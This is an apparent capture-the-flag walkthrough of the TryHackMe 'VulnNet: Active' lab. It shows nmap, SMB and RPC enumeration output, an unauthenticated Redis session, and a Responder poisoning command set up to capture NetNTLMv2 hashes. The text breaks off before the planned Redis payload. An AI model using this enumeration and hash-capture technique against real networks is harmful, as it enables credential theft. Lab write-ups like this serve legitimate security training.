TryHackMe Vulnnet: Active
Requirements
enum4linux-ng
redis
haiti
john
smbmap
crackmapexec
metasploit
powersploit
smbclient
nullinux
villain
nmap
nmap -sV -p- -Pn 10.10.22.71
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-07 20:39 EST
Nmap scan report for 10.10.22.71
Host is up (0.086s latency).
Not shown: 65521 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
6379/tcp open redis Redis key-value store 2.8.2402
9389/tcp open mc-nmf .NET Message Framing
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49683/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
49720/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.02 seconds
Takeaway: DNS (53), kpasswd (464) and ADWS (9389, .NET Message Framing) point to a domain controller, yet Kerberos (88) and LDAP (389/636) are not among the open ports, so direct LDAP/Kerberos enumeration is unavailable at this stage. Redis 2.8.2402 on 6379 is the out-of-place service and the first thing to look at.
enum4linux-ng (smb enumeration)
enum4linux-ng -A 10.10.22.71
ENUM4LINUX - next generation (v1.3.2)
==========================
| Target Information |
==========================
[*] Target ........... 10.10.22.71
[*] Username ......... ''
[*] Random Username .. 'emrlcivn'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
====================================
| Listener Scan on 10.10.22.71 |
====================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: timed out
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: timed out
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
==========================================================
| NetBIOS Names and Workgroup/Domain for 10.10.22.71 |
==========================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
========================================
| SMB Dialect Check on 10.10.22.71 |
========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: false
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true
==========================================================
| Domain Information via SMB session for 10.10.22.71 |
==========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: VULNNET-BC3TCK1
NetBIOS domain name: VULNNET
DNS domain: vulnnet.local
FQDN: VULNNET-BC3TCK1SHNQ.vulnnet.local
Derived membership: domain member
Derived domain: VULNNET
========================================
| RPC Session Check on 10.10.22.71 |
========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE
==================================================
| Domain Information via RPC for 10.10.22.71 |
==================================================
[+] Domain: VULNNET
[+] Domain SID: S-1-5-21-1405206085-1650434706-76331420
[+] Membership: domain member
==============================================
| OS Information via RPC for 10.10.22.71 |
==============================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: '1809'
OS build: '17763'
Native OS: not supported
Native LAN manager: not supported
Platform id: null
Server type: null
Server type string: null
====================================
| Users via RPC on 10.10.22.71 |
====================================
[*] Enumerating users via 'querydispinfo'
[-] Could not find users via 'querydispinfo': STATUS_ACCESS_DENIED
[*] Enumerating users via 'enumdomusers'
[-] Could not find users via 'enumdomusers': STATUS_ACCESS_DENIED
=====================================
| Groups via RPC on 10.10.22.71 |
=====================================
[*] Enumerating local groups
[-] Could not get groups via 'enumalsgroups domain': STATUS_ACCESS_DENIED
[*] Enumerating builtin groups
[-] Could not get groups via 'enumalsgroups builtin': STATUS_ACCESS_DENIED
[*] Enumerating domain groups
[-] Could not get groups via 'enumdomgroups': STATUS_ACCESS_DENIED
=====================================
| Shares via RPC on 10.10.22.71 |
=====================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user
========================================
| Policies via RPC for 10.10.22.71 |
========================================
[*] Trying port 445/tcp
[-] SMB connection error on port 445/tcp: STATUS_ACCESS_DENIED
[*] Trying port 139/tcp
[-] SMB connection error on port 139/tcp: session failed
========================================
| Printers via RPC for 10.10.22.71 |
========================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED
Completed after 31.42 seconds
Takeaway: the null session returns domain details (domain VULNNET / vulnnet.local, host VULNNET-BC3TCK1, Windows build 17763, i.e. Server 2019) but user, group, share and policy enumeration all fail with STATUS_ACCESS_DENIED. SMB signing is required, so NTLM relay to this host is off the table; capturing a NetNTLMv2 response for offline cracking still works.
impacket-rpcdump
impacket-rpcdump 10.10.22.71
Protocol: N/A
Provider: dhcpcsvc.dll
UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D5 v1.0 DHCP Client LRPC Endpoint
Bindings:
ncalrpc:[dhcpcsvc]
ncalrpc:[dhcpcsvc6]
ncacn_ip_tcp:10.10.22.71[49666]
ncacn_np:\\VULNNET-BC3TCK1[\pipe\eventlog]
ncalrpc:[eventlog]
ncalrpc:[LRPC-7d265659bc77895aff]
ncalrpc:[LRPC-3187d6a163373599c6]
ncalrpc:[LRPC-24cb1f9cdcca2d5a7b]
Protocol: N/A
Provider: dhcpcsvc6.dll
UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6 v1.0 DHCPv6 Client LRPC Endpoint
Bindings:
ncalrpc:[dhcpcsvc6]
ncacn_ip_tcp:10.10.22.71[49666]
ncacn_np:\\VULNNET-BC3TCK1[\pipe\eventlog]
ncalrpc:[eventlog]
ncalrpc:[LRPC-7d265659bc77895aff]
ncalrpc:[LRPC-3187d6a163373599c6]
ncalrpc:[LRPC-24cb1f9cdcca2d5a7b]
Protocol: [MS-EVEN6]: EventLog Remoting Protocol
Provider: wevtsvc.dll
UUID : F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C v1.0 Event log TCPIP
Bindings:
ncacn_ip_tcp:10.10.22.71[49666]
ncacn_np:\\VULNNET-BC3TCK1[\pipe\eventlog]
ncalrpc:[eventlog]
ncalrpc:[LRPC-7d265659bc77895aff]
ncalrpc:[LRPC-3187d6a163373599c6]
ncalrpc:[LRPC-24cb1f9cdcca2d5a7b]
Protocol: N/A
Provider: N/A
UUID : A500D4C6-0DD1-4543-BC0C-D5F93486EAF8 v1.0
Bindings:
ncalrpc:[LRPC-7d265659bc77895aff]
ncalrpc:[LRPC-3187d6a163373599c6]
ncalrpc:[LRPC-24cb1f9cdcca2d5a7b]
Protocol: N/A
Provider: nrpsrv.dll
UUID : 30ADC50C-5CBC-46CE-9A0E-91914789E23C v1.0 NRP server endpoint
Bindings:
ncalrpc:[LRPC-24cb1f9cdcca2d5a7b]
Protocol: N/A
Provider: N/A
UUID : A4B8D482-80CE-40D6-934D-B22A01A44FE7 v1.0 LicenseManager
Bindings:
ncalrpc:[LicenseServiceEndpoint]
Protocol: N/A
Provider: nsisvc.dll
UUID : 7EA70BCF-48AF-4F6A-8968-6A440754D5FA v1.0 NSI server endpoint
Bindings:
ncalrpc:[LRPC-061754b666383f2114]
Protocol: N/A
Provider: N/A
UUID : C49A5A70-8A7F-4E70-BA16-1E8F1F193EF1 v1.0 Adh APIs
Bindings:
ncalrpc:[TeredoControl]
ncalrpc:[TeredoDiagnostics]
ncalrpc:[LRPC-eb2cc8830176e6f2c7]
ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
ncalrpc:[SessEnvPrivateRpc]
ncacn_ip_tcp:10.10.22.71[49667]
ncalrpc:[LRPC-ad7a31532f4c443127]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
ncalrpc:[DeviceSetupManager]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
Protocol: N/A
Provider: N/A
UUID : C36BE077-E14B-4FE9-8ABC-E856EF4F048B v1.0 Proxy Manager client server endpoint
Bindings:
ncalrpc:[TeredoControl]
ncalrpc:[TeredoDiagnostics]
ncalrpc:[LRPC-eb2cc8830176e6f2c7]
ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
ncalrpc:[SessEnvPrivateRpc]
ncacn_ip_tcp:10.10.22.71[49667]
ncalrpc:[LRPC-ad7a31532f4c443127]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
ncalrpc:[DeviceSetupManager]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
Protocol: N/A
Provider: N/A
UUID : 2E6035B2-E8F1-41A7-A044-656B439C4C34 v1.0 Proxy Manager provider server endpoint
Bindings:
ncalrpc:[TeredoControl]
ncalrpc:[TeredoDiagnostics]
ncalrpc:[LRPC-eb2cc8830176e6f2c7]
ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
ncalrpc:[SessEnvPrivateRpc]
ncacn_ip_tcp:10.10.22.71[49667]
ncalrpc:[LRPC-ad7a31532f4c443127]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
ncalrpc:[DeviceSetupManager]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
Protocol: N/A
Provider: iphlpsvc.dll
UUID : 552D076A-CB29-4E44-8B6A-D15E59E2C0AF v1.0 IP Transition Configuration endpoint
Bindings:
ncalrpc:[LRPC-eb2cc8830176e6f2c7]
ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
ncalrpc:[SessEnvPrivateRpc]
ncacn_ip_tcp:10.10.22.71[49667]
ncalrpc:[LRPC-ad7a31532f4c443127]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
ncalrpc:[DeviceSetupManager]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
Protocol: N/A
Provider: N/A
UUID : 0D3C7F20-1C8D-4654-A1B3-51563B298BDA v1.0 UserMgrCli
Bindings:
ncalrpc:[LRPC-eb2cc8830176e6f2c7]
ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
ncalrpc:[SessEnvPrivateRpc]
ncacn_ip_tcp:10.10.22.71[49667]
ncalrpc:[LRPC-ad7a31532f4c443127]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
ncalrpc:[DeviceSetupManager]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
Protocol: N/A
Provider: N/A
UUID : B18FBAB6-56F8-4702-84E0-41053293A869 v1.0 UserMgrCli
Bindings:
ncalrpc:[LRPC-eb2cc8830176e6f2c7]
ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
ncalrpc:[SessEnvPrivateRpc]
ncacn_ip_tcp:10.10.22.71[49667]
ncalrpc:[LRPC-ad7a31532f4c443127]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
ncalrpc:[DeviceSetupManager]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
Protocol: N/A
Provider: N/A
UUID : 29770A8F-829B-4158-90A2-78CD488501F7 v1.0
Bindings:
ncacn_np:\\VULNNET-BC3TCK1[\pipe\SessEnvPublicRpc]
ncalrpc:[SessEnvPrivateRpc]
ncacn_ip_tcp:10.10.22.71[49667]
ncalrpc:[LRPC-ad7a31532f4c443127]
ncalrpc:[ubpmtaskhostchannel]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
ncalrpc:[DeviceSetupManager]
ncalrpc:[senssvc]
ncalrpc:[IUserProfile2]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
Protocol: [MS-CMPO]: MSDTC Connection Manager:
Provider: msdtcprx.dll
UUID : 906B0CE0-C70B-1067-B317-00DD010662DA v1.0
Bindings:
ncalrpc:[LRPC-d9b0f5b8856e36d3d1]
ncalrpc:[LRPC-d9b0f5b8856e36d3d1]
ncalrpc:[LRPC-d9b0f5b8856e36d3d1]
Protocol: N/A
Provider: N/A
UUID : 4C9DBF19-D39E-4BB9-90EE-8F7179B20283 v1.0
Bindings:
ncalrpc:[LRPC-166c27802e6b73c6ed]
Protocol: N/A
Provider: N/A
UUID : FD8BE72B-A9CD-4B2C-A9CA-4DED242FBE4D v1.0
Bindings:
ncalrpc:[LRPC-166c27802e6b73c6ed]
Protocol: N/A
Provider: N/A
UUID : 95095EC8-32EA-4EB0-A3E2-041F97B36168 v1.0
Bindings:
ncalrpc:[LRPC-166c27802e6b73c6ed]
Protocol: N/A
Provider: N/A
UUID : E38F5360-8572-473E-B696-1B46873BEEAB v1.0
Bindings:
ncalrpc:[LRPC-166c27802e6b73c6ed]
Protocol: N/A
Provider: N/A
UUID : D22895EF-AFF4-42C5-A5B2-B14466D34AB4 v1.0
Bindings:
ncalrpc:[LRPC-166c27802e6b73c6ed]
Protocol: N/A
Provider: N/A
UUID : 98CD761E-E77D-41C8-A3C0-0FB756D90EC2 v1.0
Bindings:
ncalrpc:[LRPC-166c27802e6b73c6ed]
Protocol: [MS-FRS2]: Distributed File System Replication Protocol
Provider: dfsrmig.exe
UUID : 897E2E5F-93F3-4376-9C9C-FD2277495C27 v1.0 Frs2 Service
Bindings:
ncalrpc:[OLEF2A96DE6D564C95BCA50BFBAE58E]
ncacn_ip_tcp:10.10.22.71[49720]
Protocol: N/A
Provider: N/A
UUID : F3F09FFD-FBCF-4291-944D-70AD6E0E73BB v1.0
Bindings:
ncalrpc:[LRPC-2656bdde0795bfccbd]
Protocol: [MS-DNSP]: Domain Name Service (DNS) Server Management
Provider: dns.exe
UUID : 50ABC2A4-574D-40B3-9D66-EE4FD5FBA076 v5.0
Bindings:
ncacn_ip_tcp:10.10.22.71[49696]
Protocol: [MS-SCMR]: Service Control Manager Remote Protocol
Provider: services.exe
UUID : 367ABB81-9844-35F1-AD32-98F038001003 v2.0
Bindings:
ncacn_ip_tcp:10.10.22.71[49694]
Protocol: N/A
Provider: sppsvc.exe
UUID : 9435CC56-1D9C-4924-AC7D-B60A2C3520E1 v1.0 SPPSVC Default RPC Interface
Bindings:
ncalrpc:[SPPCTransportEndpoint-00001]
Protocol: N/A
Provider: N/A
UUID : DF4DF73A-C52D-4E3A-8003-8437FDF8302A v0.0 WM_WindowManagerRPC\Server
Bindings:
ncalrpc:[LRPC-4e8e9db7c66657829c]
Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
ncalrpc:[LRPC-b3e5db05dae5d67c84]
ncacn_ip_tcp:10.10.22.71[49683]
Protocol: [MS-PAN]: Print System Asynchronous Notification Protocol
Provider: spoolsv.exe
UUID : 0B6EDBFA-4A24-4FC6-8A23-942B1ECA65D1 v1.0
Bindings:
ncalrpc:[LRPC-b3e5db05dae5d67c84]
ncacn_ip_tcp:10.10.22.71[49683]
Protocol: [MS-PAN]: Print System Asynchronous Notification Protocol
Provider: spoolsv.exe
UUID : AE33069B-A2A8-46EE-A235-DDFD339BE281 v1.0
Bindings:
ncalrpc:[LRPC-b3e5db05dae5d67c84]
ncacn_ip_tcp:10.10.22.71[49683]
Protocol: N/A
Provider: spoolsv.exe
UUID : 4A452661-8290-4B36-8FBE-7F4093A94978 v1.0
Bindings:
ncalrpc:[LRPC-b3e5db05dae5d67c84]
ncacn_ip_tcp:10.10.22.71[49683]
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Provider: spoolsv.exe
UUID : 76F03F96-CDFD-44FC-A22C-64950A001209 v1.0
Bindings:
ncalrpc:[LRPC-b3e5db05dae5d67c84]
ncacn_ip_tcp:10.10.22.71[49683]
Protocol: N/A
Provider: srvsvc.dll
UUID : 98716D03-89AC-44C7-BB8C-285824E51C4A v1.0 XactSrv service
Bindings:
ncalrpc:[LRPC-20e00a11ef5c9a4cb8]
Protocol: N/A
Provider: N/A
UUID : 1A0D010F-1C33-432C-B0F5-8CF4E8053099 v1.0 IdSegSrv service
Bindings:
ncalrpc:[LRPC-20e00a11ef5c9a4cb8]
Protocol: N/A
Provider: BFE.DLL
UUID : DD490425-5325-4565-B774-7E27D6C09C24 v1.0 Base Firewall Engine API
Bindings:
ncalrpc:[LRPC-87de8d013ce3134508]
Protocol: N/A
Provider: MPSSVC.dll
UUID : 7F9D11BF-7FB9-436B-A812-B2D50C5D4C03 v1.0 Fw APIs
Bindings:
ncalrpc:[LRPC-87de8d013ce3134508]
ncalrpc:[LRPC-0452539d4b61802f71]
Protocol: N/A
Provider: N/A
UUID : F47433C3-3E9D-4157-AAD4-83AA1F5C2D4C v1.0 Fw APIs
Bindings:
ncalrpc:[LRPC-87de8d013ce3134508]
ncalrpc:[LRPC-0452539d4b61802f71]
ncalrpc:[LRPC-4bbd50221c73d874bb]
Protocol: N/A
Provider: MPSSVC.dll
UUID : 2FB92682-6599-42DC-AE13-BD2CA89BD11C v1.0 Fw APIs
Bindings:
ncalrpc:[LRPC-87de8d013ce3134508]
ncalrpc:[LRPC-0452539d4b61802f71]
ncalrpc:[LRPC-4bbd50221c73d874bb]
ncalrpc:[LRPC-d730bac2ce4fb8e128]
Protocol: N/A
Provider: N/A
UUID : ABFB6CA3-0C5E-4734-9285-0AEE72FE8D1C v1.0
Bindings:
ncalrpc:[OLEF3CF6FA48C1CC583004A5D98EE3F]
ncalrpc:[LRPC-b7bfb08c881ef0c4db]
Protocol: N/A
Provider: N/A
UUID : B37F900A-EAE4-4304-A2AB-12BB668C0188 v1.0
Bindings:
ncalrpc:[OLEF3CF6FA48C1CC583004A5D98EE3F]
ncalrpc:[LRPC-b7bfb08c881ef0c4db]
Protocol: N/A
Provider: N/A
UUID : E7F76134-9EF5-4949-A2D6-3368CC0988F3 v1.0
Bindings:
ncalrpc:[OLEF3CF6FA48C1CC583004A5D98EE3F]
ncalrpc:[LRPC-b7bfb08c881ef0c4db]
Protocol: N/A
Provider: N/A
UUID : 7AEB6705-3AE6-471A-882D-F39C109EDC12 v1.0
Bindings:
ncalrpc:[OLEF3CF6FA48C1CC583004A5D98EE3F]
ncalrpc:[LRPC-b7bfb08c881ef0c4db]
Protocol: N/A
Provider: N/A
UUID : F44E62AF-DAB1-44C2-8013-049A9DE417D6 v1.0
Bindings:
ncalrpc:[OLEF3CF6FA48C1CC583004A5D98EE3F]
ncalrpc:[LRPC-b7bfb08c881ef0c4db]
Protocol: N/A
Provider: N/A
UUID : C2D1B5DD-FA81-4460-9DD6-E7658B85454B v1.0
Bindings:
ncalrpc:[OLEF3CF6FA48C1CC583004A5D98EE3F]
ncalrpc:[LRPC-b7bfb08c881ef0c4db]
Protocol: N/A
Provider: N/A
UUID : F2C9B409-C1C9-4100-8639-D8AB1486694A v1.0 Witness Client Upcall Server
Bindings:
ncalrpc:[DNSResolver]
ncalrpc:[nlaplg]
ncalrpc:[nlaapi]
Protocol: N/A
Provider: N/A
UUID : EB081A0D-10EE-478A-A1DD-50995283E7A8 v3.0 Witness Client Test Interface
Bindings:
ncalrpc:[DNSResolver]
ncalrpc:[nlaplg]
ncalrpc:[nlaapi]
Protocol: N/A
Provider: N/A
UUID : 7F1343FE-50A9-4927-A778-0C5859517BAC v1.0 DfsDs service
Bindings:
ncalrpc:[DNSResolver]
ncalrpc:[nlaplg]
ncalrpc:[nlaapi]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\wkssvc]
Protocol: N/A
Provider: certprop.dll
UUID : 30B044A5-A225-43F0-B3A4-E060DF91F9C1 v1.0
Bindings:
ncalrpc:[LRPC-deb93f84a023ce791c]
Protocol: N/A
Provider: gpsvc.dll
UUID : 2EB08E3E-639F-4FBA-97B1-14F878961076 v1.0 Group Policy RPC Interface
Bindings:
ncalrpc:[LRPC-ca164f4be6783b3691]
Protocol: N/A
Provider: schedsvc.dll
UUID : 0A74EF1C-41A4-4E06-83AE-DC74FB1CDD53 v1.0
Bindings:
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[IUserProfile2]
ncalrpc:[senssvc]
Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: taskcomp.dll
UUID : 1FF70682-0A51-30E8-076D-740BE8CEE98B v1.0
Bindings:
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[IUserProfile2]
ncalrpc:[senssvc]
ncalrpc:[DeviceSetupManager]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: taskcomp.dll
UUID : 378E52B0-C0A9-11CF-822D-00AA0051E40F v1.0
Bindings:
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[IUserProfile2]
ncalrpc:[senssvc]
ncalrpc:[DeviceSetupManager]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
Protocol: N/A
Provider: N/A
UUID : 33D84484-3626-47EE-8C6F-E7E98B113BE1 v2.0
Bindings:
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[IUserProfile2]
ncalrpc:[senssvc]
ncalrpc:[DeviceSetupManager]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
ncalrpc:[ubpmtaskhostchannel]
ncalrpc:[LRPC-ad7a31532f4c443127]
Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: schedsvc.dll
UUID : 86D35949-83C9-4044-B424-DB363231FD0C v1.0
Bindings:
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[IUserProfile2]
ncalrpc:[senssvc]
ncalrpc:[DeviceSetupManager]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
ncalrpc:[ubpmtaskhostchannel]
ncalrpc:[LRPC-ad7a31532f4c443127]
ncacn_ip_tcp:10.10.22.71[49667]
Protocol: N/A
Provider: N/A
UUID : 3A9EF155-691D-4449-8D05-09AD57031823 v1.0
Bindings:
ncalrpc:[OLEC572D536736FD32274A5CCD8D33E]
ncalrpc:[LRPC-b78b428e89a8c373fc]
ncalrpc:[IUserProfile2]
ncalrpc:[senssvc]
ncalrpc:[DeviceSetupManager]
ncacn_np:\\VULNNET-BC3TCK1[\PIPE\atsvc]
ncalrpc:[ubpmtaskhostchannel]
ncalrpc:[LRPC-ad7a31532f4c443127]
ncacn_ip_tcp:10.10.22.71[49667]
[*] Received 621 endpoints.
Of note among the endpoints reachable over TCP: MS-RPRN (spoolsv.exe) on 49683, MS-SCMR (services.exe) on 49694, MS-DNSP (dns.exe) on 49696 and MS-FRS2 (dfsrmig.exe) on 49720, which confirms a domain controller with the print spooler exposed on the network.
redis enumeration
redis-cli -h 10.10.22.71
10.10.22.71:6379> INFO
# Server
redis_version:2.8.2402
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:b2a45a9622ff23b7
redis_mode:standalone
os:Windows
arch_bits:64
multiplexing_api:winsock_IOCP
process_id:2592
run_id:4c9e17ea384739b0ed8265045c91514c774746c4
tcp_port:6379
uptime_in_seconds:2488
uptime_in_days:0
hz:10
lru_clock:12858312
config_file:
# Clients
connected_clients:2
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
# Memory
used_memory:970376
used_memory_human:947.63K
used_memory_rss:936832
used_memory_peak:994688
used_memory_peak_human:971.38K
used_memory_lua:36864
mem_fragmentation_ratio:0.97
mem_allocator:dlmalloc-2.8
# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1707354640
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
# Stats
total_connections_received:3
total_commands_processed:3
instantaneous_ops_per_sec:0
total_net_input_bytes:72
total_net_output_bytes:0
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
# Replication
role:master
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:0.94
used_cpu_user:1.23
used_cpu_sys_children:0.00
used_cpu_user_children:0.00
# Keyspace
10.10.22.71:6379> CONFIG GET *
1) "dbfilename"
2) "dump.rdb"
3) "requirepass"
4) ""
5) "masterauth"
6) ""
7) "unixsocket"
8) ""
9) "logfile"
10) ""
11) "pidfile"
12) "/var/run/redis.pid"
13) "maxmemory"
14) "0"
15) "maxmemory-samples"
16) "3"
17) "timeout"
18) "0"
19) "tcp-keepalive"
20) "0"
21) "auto-aof-rewrite-percentage"
22) "100"
23) "auto-aof-rewrite-min-size"
24) "67108864"
25) "hash-max-ziplist-entries"
26) "512"
27) "hash-max-ziplist-value"
28) "64"
29) "list-max-ziplist-entries"
30) "512"
31) "list-max-ziplist-value"
32) "64"
33) "set-max-intset-entries"
34) "512"
35) "zset-max-ziplist-entries"
36) "128"
37) "zset-max-ziplist-value"
38) "64"
39) "hll-sparse-max-bytes"
40) "3000"
41) "lua-time-limit"
42) "5000"
43) "slowlog-log-slower-than"
44) "10000"
45) "latency-monitor-threshold"
46) "0"
47) "slowlog-max-len"
48) "128"
49) "port"
50) "6379"
51) "tcp-backlog"
52) "511"
53) "databases"
54) "16"
55) "repl-ping-slave-period"
56) "10"
57) "repl-timeout"
58) "60"
59) "repl-backlog-size"
60) "1048576"
61) "repl-backlog-ttl"
62) "3600"
63) "maxclients"
64) "10000"
65) "watchdog-period"
66) "0"
67) "slave-priority"
68) "100"
69) "min-slaves-to-write"
70) "0"
71) "min-slaves-max-lag"
72) "10"
73) "hz"
74) "10"
75) "repl-diskless-sync-delay"
76) "5"
77) "no-appendfsync-on-rewrite"
78) "no"
79) "slave-serve-stale-data"
80) "yes"
81) "slave-read-only"
82) "yes"
83) "stop-writes-on-bgsave-error"
84) "yes"
85) "daemonize"
86) "no"
87) "rdbcompression"
88) "yes"
89) "rdbchecksum"
90) "yes"
91) "activerehashing"
92) "yes"
93) "repl-disable-tcp-nodelay"
94) "no"
95) "repl-diskless-sync"
96) "no"
97) "aof-rewrite-incremental-fsync"
98) "yes"
99) "aof-load-truncated"
100) "yes"
101) "appendonly"
102) "no"
103) "dir"
104) "C:\\Users\\enterprise-security\\Downloads\\Redis-x64-2.8.2402"
105) "maxmemory-policy"
106) "volatile-lru"
107) "appendfsync"
108) "everysec"
109) "save"
110) "jd 3600 jd 300 jd 60"
111) "loglevel"
112) "notice"
113) "client-output-buffer-limit"
114) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
115) "unixsocketperm"
116) "0"
117) "slaveof"
118) ""
119) "notify-keyspace-events"
120) ""
121) "bind"
122) ""
Findings: Redis 2.8.2402 for Windows answers without authentication (requirepass is empty and bind is unset). The data directory is C:\Users\enterprise-security\Downloads\Redis-x64-2.8.2402, which gives a probable domain username, enterprise-security, and suggests redis-server was started from that user's profile (the NetNTLMv2 capture later confirms it runs as VULNNET\enterprise-security). Unauthenticated EVAL therefore means server-side Lua executing with that account's privileges.
responder (run this in another tab)
Responder must be listening before the Redis payload fires, and on the VPN interface the target can reach: -I tun0 selects it, -d enables DHCP answers, -v is verbose, -w starts the WPAD proxy. Only the SMB listener matters for the next step.
sudo responder -I tun0 -dvw
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
